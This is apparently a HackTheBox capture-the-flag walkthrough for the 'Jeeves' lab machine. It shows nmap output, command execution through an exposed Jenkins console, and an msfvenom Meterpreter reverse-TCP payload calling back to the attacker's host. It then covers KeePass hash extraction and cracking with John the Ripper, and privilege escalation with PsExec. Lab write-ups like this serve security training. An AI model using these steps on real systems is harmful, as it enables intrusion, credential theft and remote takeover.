Jeeves — HackTheBox Walkthrough

There will be no fancy pictures, only the raw meat:

Initial nmap scan (all ports, defaults scripts, version enumeration)
root@kali:~# nmap -sT — min-rate 5000 — max-retries 1 -p- -sC -sV 10.10.10.63

Starting Nmap 7.60 ( https://nmap.org ) at 2018–04–03 17:40 EDT
Nmap scan report for 10.10.10.63
Host is up (0.061s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7–10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 19h01m59s, deviation: 0s, median: 19h01m59s
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2018–04–04 12:43:05
|_ start_date: 2018–04–01 22:48:58

It appears that the a Server is running Jenkins console on port 50000: let’s create new Jenkins Task to view user.txt

Jenkins -> New Item -> Freestyle Project -> Ok
and configure the build now:
Add Build Step button → Execute Windows batch command → 
type:
dir
pwd
whoami

and finally click on Build Now, now check Console Output:

We can see that Commands are executed under kohsuke user so let’s try to get user.txt flag from him:

http://10.10.10.63:50000/askjeeves/job/test/configure

Click on Build and We get the flag:)

Let’s deploy now msfvenom payload and upload it to our machine:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > reverse.exe

on the metasploit side, you know what to do.. and we Get a Shell!

Privilege escalation part, I found out Keepassx File under
c:\Users\kohsek\Documents\CEH.kdbx

Let’s extract Keepass password from the database:
# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
# keepass2john CEH.kdbx > CEH-CrackMe

Crack Keepassx passwords using John the ripper:
# john CEH-CrackMe — wordlist=/usr/share/wordlists/rockyou.txt — fork=4
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Node numbers 1–4 of 4 (fork)
Press ‘q’ or Ctrl-C to abort, almost any other key for status
mo(*****) (CEH)

Open Keepasx file with our password.

Use PSxec with Metasploit:

Get root.txt